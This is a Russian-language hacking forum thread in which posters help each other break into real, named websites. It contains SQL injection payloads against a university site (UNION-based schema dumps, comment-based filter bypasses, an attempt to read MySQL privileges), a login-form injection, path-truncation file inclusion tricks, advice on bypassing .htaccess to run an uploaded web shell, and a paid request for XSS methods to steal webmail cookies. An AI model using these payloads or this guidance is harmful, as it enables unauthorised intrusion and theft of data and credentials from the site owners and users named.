Я сделал таким образом: script.php?go=index.php///...///, дало ошибку, типа невозможно открыть. Но уже в конце расширения не дописывается. Возможно я чего-то делаю не так?
Подбери точное количество слэшей http://raz0r.name/articles/null-byte-alternative/ https://rdot.org/forum/showthread.php?t=2611
Привет, подскажите Есть папка для картинок, в нее загружается php файл, но в htaccess такое. И в итоге шел не работает. Code: Options -Indexes <IfModule mod_php4.c> php_value engine off </IfModule> <IfModule mod_php5.c> php_value engine off </IfModule>
Подобрал что бы было ровно 4096 символов, и все равно ошибка инклуда. Похоже в этой версии этот трюк уже не работает.
Пожалуйста,помогите найти таблицу пользователей просмотрел все, но найти почему-то не смог ( http://som.adzu.edu.ph/newsupdates/...5,6 from information_schema.tables limit 97,1
Подскажите на какие ошибки можно еще проверить? именно массово. Есть база доменов, проверял на кавычку, и гит. Есть еще какие идеи?
На вордпресс и джумлу еще, на майдамин незапароленный. А если уязвимости, то выбор тут невелик, по-моему: инклуды, sql, xss. XSS можно снимком экрана проверять, phantomjs такое из-коробки умеет делать, к примеру.
Заранее прошу прощение за возможный оффтоп, но я уже множество статей и форумов перерыл по поводу темы xss, в том числе и на данном ресурсе. Пытаюсь разобраться с xss, но никак не удаётся, к тому же многие темы примерно 10-и летней давности и мне кажется, что сейчас многое изменилось, в том числе и уязвимости уже не те. Меня интересует xss и куки в почте. Подскажите свежие темы? Или кто может помочь с этим? Буду очень благодарен, и возможно финансовая благодарность.
В XSS ничего не изменилось,браузеры фильтруют XSS лучше чем когда то,флаг httponly мешает,инфа если будет то приватно
попробуй загрузить свой .htaccess кстати можно заодно и шелл в .htaccess запилить http://forum.antichat.ru/threads/298338/
Нашел sqli на сайте - (post method) 1) подобрал количество столбцов -24, запрос отработал, ошибка пропала, все вроде как норм. webcastID=' order by 24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&submit=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C286&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion 2) даю второй запрос на колонки, снова появляется ошибка, и выводимой колонки так и нет( webcastID=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&submit=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C286&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion Как так, и что делать дальше?
ты что все это руками перебирал через лимит? Так уже никто не делает) http://som.adzu.edu.ph/newsupdates/index.php?id=-1 union select 1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6-- - все базы.таблицы:колонки смотри что надо в удобоваримом виде. -1 /*!50000union*/+/*!50000sElect*/ 1,file_priv,3,4,5,6 from mysql.users-- - SELECT command denied to user 'som'@'localhost' for table 'users' странно почему SELECT не получилось провести, или ту дело не в фильтре?....
я дам сайт, мне просто из спортивного интереса так сказать) www.standrewsclubav.ca дальше я думаю разберетесь)
Это я знаю что есть) меня интересует пример запроса, ваншотнуть тут неполучится скорее всего, но хотя бы посмотреть таблицы.... как? Ладно, попробую зайти в Кали, и просканировать через sqlmap.
